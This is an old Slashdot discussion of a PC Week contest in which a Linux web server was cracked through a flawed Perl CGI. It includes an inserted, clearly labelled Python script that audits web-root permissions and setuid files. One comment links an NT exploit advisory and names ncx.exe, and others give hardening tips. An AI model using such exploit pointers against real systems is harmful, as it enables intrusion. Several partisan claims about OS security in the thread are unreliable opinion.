    Ummmm.... first, try subscribing to NTBugtraq - not sure what newsgroup you are reading but try NTBugtraq for some fun daily reading of M$ holes in NT, IE, and IIS. As a counterpoint, you can also read the general Bugtraq - which has plenty of holes in Linux and Unix listed as well. You are right about some of the Linux flamers who won't listen to reason, but even a short study of computers will show you that NT will never be as secure as *nix - it's a system architecture thing. Having said that, no system is totally secure and bad admins or users can undermine the best of security.

  35. Re:[offtopic] a gender neutral way to say it by mpe · · Score: 1


    Referring to a single person of unknown gender as "they" is common slang but is not correct english.

    Or maybe it's just incorrect in the American dialect of English especially since the FAQ reference given is to an American site.
    Note that in English there is at least one other example of a supposedly plural pronoun being used as singular. Though you have to be the monarch to do so.

  36. Too many variables by .havoc · · Score: 2

    Unless both systems were running the same web server, and the same set of scripts, the whole contest is really irrelevant. Until they install Apache on both boxes and choose a common scripting platform, they are wasting everyone's time.

    1. Re:Too many variables by metasim · · Score: 1

      Regardless of how they go about it, they are still wasting everyone's time. Like you said, there are too many variables (e.g. competency of administrator) to make any of these security competitions interesting, although the LPPC one was about as good as it gets due to the "out of the box" criteria. What are we trying to prove? That M$ sucks technologically? If that is the case, I think the point has been missed as to why M$ is where it is.

    2. Re:Too many variables by pdk · · Score: 1

      Marketing ... pure and simple. And if conspiracy theorists contribute, the right amount of money in the right hands at the right time.

      --
      Paul K.
    3. Re:Too many variables by Anonymous Coward · · Score: 0

      Oh come on, listen to what you are saying. There is no way that any two OSes could have the same configuration, esp two as dissimilar as linux and NT. I think that the test is extremely valid as it mirrors a real world situation. I am sure that the ppl at PCWeek took care to make the tests as fair as possible (security fixes etc...), ZDNet has been covering and supporting linux for some time now, more than most... of course that might be because of association with hype.... :( Oh well Nathan (sorry for the AC, too lazy to log in) "I don't measure a man's success by how high he climbs but how high he bounces when he hits bottom." -- General Patton

    4. Re:Too many variables by KrAphtd1nN3r · · Score: 1

      Even then, it would be biased. Apache is far better on a Unix platform than on a Windows machine!!


      "Code free or die!"

    5. Re:Too many variables by Anonymous Coward · · Score: 3

      Hmmm.

      Those are mighty sour grapes there....

      Question- if the same CGI script(s) were running on both systems, why didn't it fail on the NT system as well?

      Could it be that since the services are wide open on a Unix system once security is breached (single point of vulnerability- access to root), while it's more difficult to do as much through remote access on an NT system (granular security model, no remote access command prompt by default), that the faulty CGI script is a far more serious problem on Linux than on NT?

      Since I don't know all the details of the failure (the links in the story point to an infantile "did too!/did not!" discussion thread) it's hard to discern the details of the test.

    6. Re:Too many variables by Anonymous Coward · · Score: 0

      The mindset of the Linux nutter is that when Linux loses (as it often seems to), the test was unfair and/or part of a vast, dark conspiracy directed by Microsoft. They're fanatics on a Jihad; they don't have to be rational, just noisy enough to draw attention to their cause.

      Always good for a laugh, though, I must say.

      PS Perhaps I'm part of that very conspiracy, eh?

  37. Re:Can you say "one-track mind"? by Dr.+Evil · · Score: 1

    For the same reason as I said above, as well as the fact that most Windows users probably wouldn't notice the fact that they'd been cracked. They can't simply type "w" and see who's logged in, and they're more used to seeing their computer slowing down and having the drives running for god-knows-what-reason. Last time I was using a cable modem, there were several dozen machines that would've been rather easy to get into because they had their drive shared without a password. Short of deleting all the files, how would anyone possibly know I was in their stuff? They wouldn't. And even if I deleted any of their files, without the logging present like there is under Unix, they wouldn't be able to figure out that it was an external user that wiped the files, and not some weird glitch in the system.

    Actually, NT's file auditing features are great. The NT security model is very smooth on the small scale. I mean, within the server and for remote connections to the server. They're just not turned on by default... but neither are Linux's.

    Credit where credit is due. The fact of the matter is, unless this CGI hack managed to somehow dig out a root exploit from a non-privileged account, this was not an OS bug. Linux as an operating system DOES protect against this sort of thing. There is no reason whatsoever that the files should have been capable of being modified by the user of the CGI application. The fact of the matter is that the operating system was not configured at all for security. They relied 100% on the CGI application to defend their files.

    A non-privileged application had a bug in it which allowed someone to modify unprotected files. Quick, send out the CERT advisory!

  38. Re:PHEAR! Let's examine the facts, first by mpe · · Score: 1


    Linux is not that easy to setup securely. And obviously, looking at the LONG list of non-standard changes made to the NT box, neither is NT.

    If you are making "non standard" changes with the idea of increasing security you had best know exactly what you are doing. Otherwise the most likely result is less security.

    Pay up to the guy that got in. Then fix the flawed CGI (or release the source so that somebody who's competent can), and run it again.

    Or if they don't want to release the source of the CGI, remove all CGI's from both machines which aren't either standard or OSS

  39. ... by Signal+11 · · Score: 4
    cut to the next Jesse Burst article..

    ... It's the responsibility of the Operating System to ensure security. blah blah blah.. It is obvious that linux does not have Enterprise-level reliability. blah blah blah... blah blah.. IIS is better than Apache... blah blah... The problem here is that the user doesn't have access to a GUI, and thus can't see problems like this... blah blah blah... Of course Microsoft would have released a service pack by now - what does the Linux offer? A cryptic "patch" option. They should have an easy-to-upgrade "click here to compromise your security" feature like NT does... blah blah blah...tune in next week for 'Why I'm so cool, and you're so not.'


    1. Re:... by zempf · · Score: 4

      cut to a Jesse Burst article 3 months later...


      ..Linux is the wave of the future...blah blah blah...open source is the way to go...blah blah blah...

      :)

      -mike kania

    2. Re:... by Anonymous Coward · · Score: 0

      >blah blah blah...tune in next week
      >for 'Why I'm so cool, and you're so not.'

      that's not jesse berst, that's jwz...

    3. Re:... by Morpheous · · Score: 1

      That is really funny. I used to subscribe to the Berst Alert way back, but I was quickly turned off by his arrogance. The newsletters would start off with something like, "Last weekend, while I was giving the keynote address at such-and-such expo..." Not to mention that the newsletters were devoid of any real content. I quickly unsubscribed, and never went back to ZDNet again...

      --"A man's Palm is his best friend."

      --

      --"A man's Palm is his best friend."
      (IIIx, that is...hehehe)
  40. The Art of FUD by LoppEar · · Score: 1

    I agree with your viewpoint on a typical Linux system shown to be less secure. I don't think this reflects on the OS or the principles behind it though.

    Rather, I believe that Linux can be at least as secure (and much more quickly fixed) as NT. As numerous people have mentioned, it is a matter of the people administering the system not taking the proper steps. But I don't think this necessarily reflects on them either. (Well, in the case of these "tests" I think it is sloppy. I'm talking about general use of the OSes.)

    My concern lately has been on user education. People have to know what they can do to improve their systems, that it is not the OSes fault but simply corrections that need to be made in the setup. I'm not sure about how this user education should occur, but I know it is important. Both Linux and MS zealots will use the latest error-filled results to push their platform, but the end user is not helped by choosing either of these without education about what each really entails.

    As far as your comment about no real OS existing anymore...Ok, I see your point. I see no backup for it, no reasoned explanation. You are right, I personally cannot recall an OS which was the epitome of user friendliness while incredibly powerful. And I agree that the future will have OSes that come closer and closer to that goal. Of course, I believe the future is whatever we make it, so I plan on pushing Linux towards that perfect blend.

    LoppEar.

  41. Re:CGI Script Security by mmoore · · Score: 1

    You would be surprised, but I have seen MANY perl scripts that write a log to a file in a directory that has 755 or even 777 permissions. I actually do this myself when I develop them-and worry about the permissions later. So...this may not have been a case of bad CGI-but instead a case of bad implementation.
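
The permission review these comments describe (which files and directories under a web root the web server's account can modify, and which programs are setuid), as an added example that is not part of the thread. The directory layout, every file name other than advisory.cgi, and the uid values are constructed for illustration.

```python
import os
import stat
import tempfile


def can_write(st, uid, gids):
    """Apply the POSIX class rule: owner bits if uid owns the file,
    else group bits if one of gids matches, else the 'other' bits."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit_web_root(root, uid, gids=frozenset()):
    """Return sorted (relative_path, finding) pairs for a non-root account."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode bits are not meaningful
            rel = os.path.relpath(path, root)
            writable = can_write(st, uid, gids)
            if stat.S_ISDIR(st.st_mode):
                # A writable directory lets the account create or replace
                # entries in it, whatever the modes of the files inside.
                if writable:
                    findings.append((rel, "dir-writable"))
                continue
            if writable:
                executable = st.st_mode & 0o111
                findings.append(
                    (rel, "executable-writable" if executable else "file-writable"))
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                findings.append((rel, "setid"))
    return sorted(findings)


# Constructed sample layout: (relative path, mode, is_directory).
SAMPLE = [
    ("cgi-bin", 0o755, True),
    ("cgi-bin/advisory.cgi", 0o755, False),
    ("cgi-bin/helper", 0o4755, False),   # hypothetical setuid helper
    ("logs", 0o777, True),               # the "755 or even 777" log directory
    ("logs/access.log", 0o666, False),
    ("index.html", 0o644, False),
]


def build_sample_tree(base):
    """Create the constructed layout under an existing empty directory."""
    os.chmod(base, 0o755)
    for rel, mode, is_dir in SAMPLE:
        path = os.path.join(base, rel)
        if is_dir:
            os.mkdir(path)
        else:
            open(path, "w").close()
        os.chmod(path, mode)  # explicit chmod, so the umask does not matter


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as base:
        build_sample_tree(base)
        owner = os.stat(base).st_uid
        cases = (("content owned by the web account", owner),
                 ("web account is a separate user", owner + 1))
        for label, uid in cases:
            print(label)
            for rel, finding in audit_web_root(base, uid):
                print(f"  {finding:20} {rel}")
```

When the content is owned by the account the server runs as, even mode 755 leaves every CGI replaceable by that account; with a separate owner only the 777 directory and the 666 log remain writable.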

  42. Pony Up by quux26 · · Score: 1

    As a community, we need to ante up, acknowledge that this is something that needs to be worked on, and move on. Perhaps set up a challenge that requires a flaw in the OS to be exploited.

    I just have to think that if the same thing happened to the NT box, there would be no grumbles. A victory would be declared and any talk otherwise would be met with much flameage.

    Fact is, we all know that Linux can squish NT flat. Let's set up a test that proves that.

    My .02
    Quux26
    http://www.intap.net/~j/


    --

    My .02
    Quux26
    www.crashspace.net
    1. Re:Pony Up by .havoc · · Score: 1

      I disagree.

      As a 'web guy', I am always conscious of the security of my scripts. I carefully watch for openings that could compromise a client's site due to my oversight.

      Had the NT gone down to a CGI loophole, there would not have been great celebrations. The OS should not be criticized due to a CGI programmer's ignorance or arrogance.

    2. Re:Pony Up by Anonymous Coward · · Score: 0
      This has nothing to do with the Linux community. The flaw didn't have anything to do with Linux. So there's no need to care about this at all.

      I agree, a victory should be declared. But then they should fix their lame CGI and try again.

    3. Re:Pony Up by dammitjim · · Score: 1

      > Fact is, we all know that Linux can squish NT flat. Let's set up a test that proves that.

      You sound like MindCraft. The purpose of a test is not to prove something, but rather to TEST something.

      These tests are valid - not as a measure of one platform over another, just as a measure of an overall setup. The cgi compromised the Linux box. So fix the cgi, set the test up again, and let's find the next hole.

  43. Re:[offtopic] a gender neutral way to say it by Anonymous Coward · · Score: 0

    Actually 'they', in common english usage can be either singular or plural. It's perfectly acceptable to use it in this case. he/she leaves out the gender neutral (like marilyn manson). You'd have to use he/she/it (which sounds bad when you say it) to be perfectly PC. :)

  44. Well what did THIS prove? by Tarnar · · Score: 5

    2 Things:

    #1, Absolutely nothing about NT or Linux itself.

    #2, A chain is only as strong as its weakest link. In this case, the weakest link was a poor CGI.

    So where from here? Lets try it with a better CGI, maybe let everyone see the conf files or something.

    Or maybe PC Week should release all the conf files to the cracked box, so the Community can comment on what should/shouldn't be in there.

    1. Re:Well what did THIS prove? by Anonymous Coward · · Score: 0
      Quite a lot I think. Let's start with it ought to make some admins nervous about what they are having on their machines.

      Secondly it proves that security does not mean setting up a machine with OS XXX, installing ipchains or some other software YYY and thinking that was it.

      Me thinks it is a very very dangerous attitude and found on all levels. No technology can replace brains. Do not let this decay into a Linux vs. NT discussion, as as soon as this happens what is really important is going to be lost.

    2. Re:Well what did THIS prove? by mmoore · · Score: 2

      I think that more contests such as this will probably continue to turn out with the same results. Barring from the fact that this was a security blunder in the CGI code (I am assuming perl?)-everyone is right...this was probably also due to a lack of knowledge of administration on the Linux machine. So now the Open Source community has something to take a look at-c'mon people, they have been rubbing it in our faces ever since the Mindcraft tests... Linux is not a perfect OS (yet)-instead of ranting and raving we need to FIX the problems that these tests are cranking out.

      I don't get mad, or jealous when Microsoft wins one-and all the excuses in the world aren't going to help. So, apparently what we have learned is that we need to make Linux more secure right out of the box-and easier to configure. (Like I said, don't get me wrong-I do understand that it was a CGI blunder), but we really don't need to use this as yet another 'crutch' to avoid the problems. There are other tests that Linux has failed at-the re-make of the Mindcraft tests didn't prove anything except that the problems can be REDUCED with good administration, and not RESOLVED. So these are the things we need to be pushing RedHat, SUSE, Caldera, etc... to implement in their distributions.


      P.S.: There is a similar crack-contest going on at http://www.3rdpig.com , and they are offering a $1000 dollar reward as well, you have to get the contents of a file called SecurityDemo. This is a great example of a nice-secure system, but unfortunately it is still pretty buggy. If you go there you will see what I mean. It is very hard to get around, and you are restricted BIG TIME-fork errors flying around in bash, access permissions denied to certain libraries, etc, etc..

    3. Re:Well what did THIS prove? by Anonymous Coward · · Score: 1
      #1, Absolutely nothing about NT or Linux itself.

      #2, A chain is only as strong as its weakest link. In this case, the weakest link was a poor CGI.

      This is only partially true. If it was a weak CGI on Inferno, with a properly designed WWW server, the system security would not have been compromised (there is no "root" anyway). It is the OS responsibility to ensure that the weakest link doesn't bring all the OS security down, and Linux failed.

  45. Re:[offtopic] a gender neutral way to say it by SMN · · Score: 1

    Write it this way: "While they didn't exploit an OS-specific hole" ...perfectly good English, and perfectly gender neutral

    Actually, the term "they" is plural, leading to a subject/verb disagreement. That really counts as slang and is commonly used, but it's improper English (my teacher jumps on us for that). The only proper way to say it that I know of is "While he or she didn't exploit an OS-specific hole..."

    --
    -- Imagine how much more advanced our technology would be if we had eight fingers per hand.
  46. Re:[offtopic] a gender neutral way to say it by DiningPhilosopher · · Score: 2

    Referring to a single person of unknown gender as "they" is common slang but is not correct english. "They" is always plural when used correctly.

    Many people argue that anything used widely enough becomes correct. This is true but I don't like it (although I don't have time to learn Latin... :-)

    From a practical standpoint, using "they" as singular makes a correctly singular noun sound incorrect, e.g. "Everyone was blowing their nose" vs. "Everyone was blowing their noses" - borrowed from the alt.english.usage FAQ. "Everyone" is singular, requiring the singular "nose", but "their nose" sounds strange...

    For information than you ever wanted on the topic of gender-neutral pronouns, see The Gender Neutral Pronoun FAQ.

    --
    /* The beatings will continue until morale improves. */
  47. Now for a real test by ajs · · Score: 1

    A real test would have taken several Linux systems and several NT systems (not to mention the other players like FreeBSD, Solaris, etc) and load each one with a competing set of internet content technologies. Let people show how strong or weak THOSE TECHNOLOGIES are, and breakins across-the-board on one OS will show a generic OS weakness.

    The only problem is that this only shows the resilience to script-kiddies. Most of the serious intruders (you know, the ones who do this kind of thing for PROFIT) would never be so stupid as to take part in such a contest. Plus most such intruders are INTERNAL, and end up using non-network based attacks (e.g. physical access, social engineering, etc). As the man said in "War Games": "Mr. Potato Head! Back doors are not our secret!".

    There is a point of diminishing returns in tests like these, and I think those of us who have the source to our OSes in our grubby little hands know who's safer.... :-)

  48. Re:wrong by Anonymous Coward · · Score: 0
    It doesn't matter what os you use, NT, Windows 95, OS/2, AIX, Solaris, Linux, FreeBSD,

    It just shows your ignorance. The only OSes you know are Windows and NT (and OS/2, which is similar to Windows).

    IF you run a cgi script with a massive hole in it you will get hacked.

    No. Not on a properly designed OS. Not on Inferno.

  49. Re:wrong by Anonymous Coward · · Score: 0
    IF you run a cgi script with a massive hole in it you will get hacked.

    And if you run a program doing peek/poke in the system memory you will crash your machine? Rh, but that's forbidden by modern OSes! Well CGI scripts could similarly be forbidden to read/write on the filesystem the same way.

    Some people ridiculed DOS, Windows 3.1, Windows 95, MacOS, because they lacked memory protection. The same people must acknowledge that the lack of namespace protection (or at least ACL) makes Linux as ridiculous when it comes to security.

  50. MS: 1 Linux: 0 by Anonymous Coward · · Score: 0

    Does anyone here know enough to crack an NT box? Or are we just a bunch of trash talking bastards.

    1. Re:MS: 1 Linux: 0 by Anonymous Coward · · Score: 0

      As it's set up the NT box can't really be cracked trivially - it could be crashed or DoS'ed but that doesn't count.

      One of the easy recent ways to get into an NT box was with this:

      http://www.eEye.com/database/advisories/ad06081999/ad06081999-exploit.html

      using ncx.exe ... but the securent host is pretty much immune to this 'sploit.

      Not to foam with zealotry or anything but the test is a little silly. Pretty much any Unix box can be locked down real tight (even to the point of running on mostly read only media - but then you lose on "openness" and convenience) and can be made at least or more secure than NT systems are "out of the box". As well there's a *lot* of quite easily hackable NT hosts out there ...

      As for the tone in here well take it with a grain of salt - most linux "workstation end-user" types are less than 16 years old. I'm an old dog (over 40) and have been using and admining *nix for a *long* time. I've seen it hacked and attacked every which way. Security in Unix (and I would think NT as well) is the result of an ongoing process - it is not an endpoint one achieves and then forgets about. Security is obviously *related* to OS design philosophy (and NT and its VMS heritage is designed with a more closed access model in mind) but if you think that's where it ends, well you'll have an exciting time gaining experience in security and sysadmin'ing over the next few years!

  51. Re:Who wrote the CGI script, what was it used for? by Anonymous Coward · · Score: 0

    According to JFS who did the crack: "After some searching on the WWW I found out that photoads was a commercial CGI package from "The Home Office Online" (http://www.hoffice.com). It sells for $149, and they grant you access to the source code (Perl), so that you can check and modify it. "

  52. One day there will come a great OS by Anonymous Coward · · Score: 0

    I agree on your last comment. I can't wait to use a computer that: 1) has no hardware upgrades (all machines [of that series] are built of the same components) 2) uses "intelligent modules" (no software, no operating system) Computers & operating systems are impractical now (1999). Our grand children will have a hard time understanding, why we were smart enough to fly to the moon ..... but too primitive to think practical? I have a dream ..... one day, someone will build the machine that I can't finish. One day, communication and education will be available to users without the scare and worry we have to put up with in 1999. I can't wait to go to level II.

  53. Re: That's not an OS crack you idiot by Anonymous Coward · · Score: 0

    That is stupid. Changing the DNS records to spoof them because of one typo is not cracking the OS - that is dumb.

  54. Re:[offtopic] a gender neutral way to say it by DiningPhilosopher · · Score: 1

    ahem.

    That's "MORE information than you ever wanted..."

    --
    /* The beatings will continue until morale improves. */
  55. The CGI used to crack it IS open source by Anonymous Coward · · Score: 0

    According to JFS who did the crack: "After some searching on the WWW I found out that photoads was a commercial CGI package from "The Home Office Online" (http://www.hoffice.com). It sells for $149, and they grant you access to the source code (Perl), so that you can check and modify it." Having the source code is the way he did what he did, he details how he did just that. Open Source is god's gift to crackers, of course they are promoting it from within the community. It gives them advantages to cracking far more than any thing else you can think of or name. Open source may be good in some ways but it is horrible for security!

  56. Re:[offtopic] a gender neutral way to say it by DiningPhilosopher · · Score: 1


    Common usage is far from correct usage... Try watching daytime talk shows.

    --
    /* The beatings will continue until morale improves. */
  57. Re:Must Resist by C.Lee · · Score: 0

    > what is PC Week? It is a magazine oriented towards Windows users.
    >Actually, it's a magazine for managers of PC networks, not "Windows
    >This means lots of Novell, NT, and Linux coverage. Those are pretty
    >much the most popular PC server platforms right now. Most of the

    You've *NEVER* read a single issue of PC Week, have you? It's nothing but a Windows-oriented magazine and has been since Day 1 of its publication. That mag knows only one thing and it's Windows. To claim that this mag has lots of Novell and Linux coverage is laughable. PC Week has never been a platform-neutral magazine like the old Byte and Compute! mags were. To imply otherwise is a flat-out lie.

  58. Re:What if IIS had the hole? by Shadowlore · · Score: 1

    You can download and install IE5 seperately too. According to MS it is still 'integrated' and a part of the OS.

    --
    My Suburban burns less gasoline than your Prius.
  59. Re:Sounds like a valid result to me by Zurk · · Score: 1

    one word : HURD.

  60. Re:Can you say "one-track mind"? by Anonymous Coward · · Score: 0

    >Why is network security so complicated in Linux as compared to Windows?


    Toys are easier to administer than tools. Especially when you have so few to play with!

  61. some code must be closed by LocalYokel · · Score: 1

    Open source CGI's are fine, if you don't need anything more than Matt Wright's guestbook -- if you're like the other 99% of the world that needs something genuinely useful, you'll have to put some nuts and bolts together. Proprietary code protects internal information. Would an honest person volunteer to help you work out a script for accessing a corporate database for free?

    Security through obscurity works, just don't depend on it as your first line of defense. If you don't know who's watching or where the loot is, there's really not much point of picking the lock.

    BTW, it's called "PC Weak"...
    --
    E2 IN2 IE?

  62. Linux the ever changing thing... by Anonymous Coward · · Score: 0

    It's amazing how the Linux community expands and contracts the term "Operating System" to fit whatever psychotic rage they are currently going through. A cgi script on a Linux box magically lets users modify the site: THAT ISN'T THE OS! They should have had old Ted Blinglehouser set up the machine because he would have made it rock! ZDNet is against us! Poor, tired Linux! If, on the other hand, RDS (which is an add in filter added by MDAC), VBScript, or Perl on a NT box running in ASP script allowed a security hole it is undeniable proof that the operating system sucks.

    If you guys could see yourself without the zealotry you'd realize how ridiculous you all are. I'm sure this will incite 15 Linux lackeys to ramble on...save it.

  63. "Linux" by jcs · · Score: 1

    How can this be an accurate test of Linux vs. NT? Linux is just the kernel. The software (GNU or otherwise) is really what's at stake here. If you compromise a CGI script, what difference does it make whether that script was running on Linux or OpenBSD? The system is still compromised, and it didn't make any difference what operating system it ran on.

    This shouldn't be a Linux vs. NT battle. Make it an Apache vs. IIS battle (or Perl vs. ASP if you want) and leave the underlying operating system out of the whole mess. It just results in bad press for both parties (i.e., in the LinuxPPC contest, the NT server was never actually "hacked", yet it was down half the time which made it look bad.)

    1. Re:"Linux" by Anonymous Coward · · Score: 0
      This shouldn't be a Linux vs. NT battle. Make it an Apache vs. IIS battle (or Perl vs. ASP if you want)

      Wrong. How do you run IIS on Linux ? You can. What OS are you going to run if you want to run apache ? Linux, FreeBSD or a commercial Unix.

      This is an accurate test, because one of the first things a company wants these days is to have a WWW server, and using Linux means mostly running apache, while using Windows, means mostly running IIS. This is not always the case, but this is what happens in 90% of the cases.

  64. Re:On what theory? by Anonymous Coward · · Score: 0
    I'm not sure what happened, and the site doesn't seem to say, but if they were running CGI input without checking it they're:
    a) Dumb
    b) Limited to what that CGI can do.

    Alright, and then a MacOS user will tell you that you don't need freaking memory protection, because you just have to check what your program is doing. Sorry but I don't buy that. With a proper OS, it doesn't matter, if your program is fiddling incorrectly in memory, because at worst it'll get a Segmentation Fault, and will be stopped. The same way, in a properly designed OS, it does not matter what a CGI is doing, it will be prevented from doing anything it isn't supposed to do. See: with my Inferno example there would be no insecure CGI script. Get the point? Netscape can crash a Mac, but can't crash Linux. CGIs can compromise Linux, but can't compromise Inferno.

    If they configured their machine so that their CGI can do security leaks, what is the OS supposed to do, say "No, you can't do what you want. Go away and stop trying to be creative?"

    You could configure CGI to do security leaks on Inferno. Much like you can fiddle with system memory with Linux by using /dev/mem. But by default you are secure. It takes an explicit step to become unsecure. This is what is needed.

    You might be able to make an argument that the same sort of flexibility doesn't exist on NT and thus you can't do this sort of stuff

    I don't care about NT. Windows 3.1 was the worst OS ever "designed", NT was a decent fix for the design, but the implementation is crap. In general, the quality of OSes has been getting worse and worse with time. It is no surprise. When the computers were damn expensive, it was acceptable to spend 1 day of top-level semi-god programmer, to make a program run 10s faster, and the ratio semi-god programmers/computers available was very high. Nowadays, you're going to waste 1 GB to win 10 seconds programmer time (it is ok, it is just the way the things are). Plus there is much pressure to release products as soon as possible, even in eternal beta state.

    Remember that Unix was a stripped down version (replacement) of Multics, that was too complex at the time. But nowadays, your average pocket calculator has probably 100 times the CPU/memory power of machines on which Multics was expected to run, so Multics won't be too bloated on a modern computer. And Unix, being simpler, doesn't implement everything Multics did (although many features were retrofitted and new ones were added).

  65. pcweek test by ariux · · Score: 1

    Sounds like a fair and empirical test to me: set up two boxes with customary tools and security measures, then let people try to hack them. The conclusion: Linux security needs work.

    1. Re:pcweek test by Anonymous Coward · · Score: 0

      security always needs work

  66. Re:Real world usage. by xrayspx · · Score: 1

    This is exactly what we have at my company. Better to have 3 web-servers OUTSIDE the firewall system, than to have to protect EVERY system inside it. I'm even (quickly) winning my boss over to Linux, I guess I live in a decent world after all.

  67. Opinion.. by Anonymous Coward · · Score: 0

    I personally think that we should all lay off NT for a while... And wait 'till it is adopted by all the banks and ATM machines. This may take some time as the majority of banks have invested heavily in OS/2 but since OS/2 is fast becoming a dead duck, they should change soon enough.

    The advantage - anyone with half a brain could then get rich quick by transferring funds from Bill Gates bank account to their own... The lack of security in NT would ensure that the attack was not traced. Okay, one would have to be clever and involve many unaware 3rd party bank accounts and slowly trickle it in to your own... But it could be great!

    Ahh... One can dream...
    Let all the Microserfs wallow in their false sense of security...

  68. Re:Must Resist by IntlHarvester · · Score: 1


    Check the online PC Week archives at:

    http://www.zdnet.com/pcweek/filters/past/

    --
    Business. Numbers. Money. People. Computer World.
  69. Re:Scientific method by quux26 · · Score: 1

    Not wanting to slate you or anything but as a scientist you should know that generally it is better to test and then draw conclusions than to set out to prove something with a test. A lot of this "monday morning quarter-backing" would be avoided if that was the approach used when setting up and observing tests.

    Point very well taken. What I mean to say is ...I'm open to admitting that my original premise was flawed. I also would like to point out that my original post was very poorly written.

    My .02
    Quux26
    http://www.intap.net/~j/

    My .02
    Quux26

    --

    My .02
    Quux26
    www.crashspace.net
  70. Re:Can you say "one-track mind"? by hawkestein · · Score: 1

    The comparison is completely valid. Not all of us are running Linux as a server. Personally, I use it as a development platform. Just because I'm not running Apache doesn't make my Linux box useless (gcc runs just fine).

    It's annoying to me that the default Redhat installation is to have all services running, so that it's relatively easy to hack into my system. When you install NT out of the box, it doesn't automatically install a web server, an FTP server, a telnet server (not that NT has telnet servers...)

    The point is, for newbies, Linux is insecure. You have to know *something* about network administration to protect your box, even if it means editing your startup scripts or your hosts.deny file. And, as more and more people use ADSL and cable modems (like me), there are more and more insecure Linux boxes out there.

    It's Redhat's fault, not Linux's. But it's still a "Linux" distribution issue.
    ---

    --
    -- Will quantum computers run imaginary-time operating systems?
  71. Bombproof Linux Webserver by Anonymous Coward · · Score: 0

    the "hack this" box at www.linuxppc.org is doing well ... Here's weird things we've done over the years (sometimes all at once):

    Remove all shells except sh.

    Shutdown everything except the web server port and ssh.

    Use tcpwrappers /etc/securetty etc to restrict logins to a limited set of hosts and record scans etc.

    Limit the number of users to a small (3) wheel group (that can be sudo'ed to - root can't be sudo'ed to) and that use a very simple customized admin tasks shell we wrote in python.

    Uninstall sendmail and install exim. Have the system forward any mail it needs to send to another box that checks for nastiness.

    Get your system tuned and then burn / /usr /etc onto a CD (some /etc/ files are symlinks to /var). Our webpages change very little so we burned most of them onto another CD. We have very fast SCSI cd's and huge RAM and a fast disk for swap.

    Confuse everyone by running an unusual httpd chrooted to an unusual location etc. etc.

    Replace lots of standard shell commands with equivalents written in python (less buffer overflows crap).

    etc etc blah blah

  72. Re:Linux lost, period. by Anonymous Coward · · Score: 0
    I wholeheartedly thank the moderator that labelled me as a troll.

    I came back to post a 30-line patch to illustrate how easy it is to forbid a process to do anything other than read,write,exit,break,munmap, to illustrate my point, but meanwhile, it was official: I'm a troll.

    Well thank you very much. I've been specially appalled at the degree of ignorance of Linux users today. I guess it is no longer necessary to post the patch. I guess if I want to make strong but accurate statements about security in general (Multics, capabilities, Inferno,...), I'll have to join the users of another free Unix.

  73. Ziff Davis 0wn3d by MS, your responsibility by voxman · · Score: 1

    They can't easily keep the good reporting out, but they can sure as hell put biased reporting in. Encouraging a novice to set up an NT and a Linux box for a security test is a no-brainer for MS. Out of the box, linux is pretty darn far from secure. It is our responsibility in such tests to crack both boxes, and secure the linux box.

  74. This does prove something by Al+Wold · · Score: 1

    As much as we may hate to admit, this does actually prove some weaknesses, not in linux, but in unix in general. The flexibility of the operating system allows it to be exploited easier in some situations. Since you can do basically anything to the machine from the command line, anything that possibly has access to the command line can do anything, as well if it is compromised.

    On NT, this isn't true. You have to use their little GUI to add users and such, so it would be pretty hard to actually be able to intrude the box by exploiting something like a CGI script. You may be able to erase files and things like that, but not actually get in and make yourself an account.

    So, basically, the reason Linux lost was because it is flexible and extremely controllable from a command prompt. Can Microsoft say anything like that about NT? This may lead to a loss in security, but I guess it just makes sure we do our homework when setting up remotely accessed services.

  75. Re:Was it really a suprise? by iceburg · · Score: 1

    Another reason I wasn't really surprised was since most webservers run some form of *nix, most "hacks" are designed for *nix. If NT ever gets more webserver share, and more things worth getting into, more NT boxen will be compromised.

    --
    Prudence | Justice | Fortitude | Temperance
  76. Re:What if IIS had the hole? by cookd · · Score: 1

    IIS is much more a part of the operating system than Explorer, which MS argued for weeks was a part of the server. And it is much more a part of the OS than Apache.

    You buy Windows NT *SERVER*. You can make it a file server, a domain server, a DHCP server, a WINS server, or an Internet server. If you want it to be an Internet server, you install IIS. IIS is supplied as part of the OS by Microsoft to all owners of NT Server ON THE INSTALL CD's (Apache happens to come with some distros, but it comes as part of the applications library, not as a part of the kernel or base install). It was created by the creators of NT Server (Apache != Linux). It integrates itself into the OS as a system service (Apache doesn't run in kernel space, and doesn't need Admin privileges).

    Now, if you said Netscape Server, things would be different.

    --
    Time flies like an arrow. Fruit flies like a banana.
  77. Amen Brother by Hangtime · · Score: 1

    Why can't all the distros for Linux and perhaps all the Unices for that matter turn off those things that are "MAJOR" security risks. Had a couple of Israelis put a sniffer on two Solaris boxes that weren't locked down very well on campus and therefore a whole zone of IPs had to change passwords because of it. Just no need for that sort of thing. Linux and all Unices should come locked down or close to it, then an FAQ explaining all the things that are turned off and why including the security risk they pose. Just one man's opinion.

    Hangtime

    1. Re:Amen Brother by miahrogers · · Score: 1

      You see, making linux absolutely secure can also be a pain in the ass. For instance you could make a linux box where you had to be root to do any network access or use disk drives. But for the 95% of us who don't give a shitsy about having our computers THAT secure it would just be really annoying. As I understand it redhat also offers a "secure server edition". I haven't used it so I can't vouch for it, but yes it would be nice to have a supersecure linux and a not so secure linux (like mandrake) to play with.
      char *stupidsig = "this is my dumb sig";

  78. Re:Sour Grapes - linux lost by smale · · Score: 1

    I couldn't agree more, Red Hat is a terrible distribution, I can't use it, and I have been using Linux for 3 years, primarily Slackware, but I have tried them all and Red Hat hits rock bottom by far.

  79. Jesse and lack of accountability... by NikoDemous · · Score: 1

    The one thing that really pisses me off is that these people who can not even pass the muster as a small town reporter are too chicken to debate.

    I've challenged Jesse to debate me online and have never received an answer.

    Remember this... Jesse Berst and the like have NO ACCOUNTABILITY! They can say any strange, bizarre thing that pops into their challenged minds without the mildest shred of proof under the guise of journalism.

    They don't respond, nor do they take responsibility for their actions. Just typical arrogant Microsoft people.

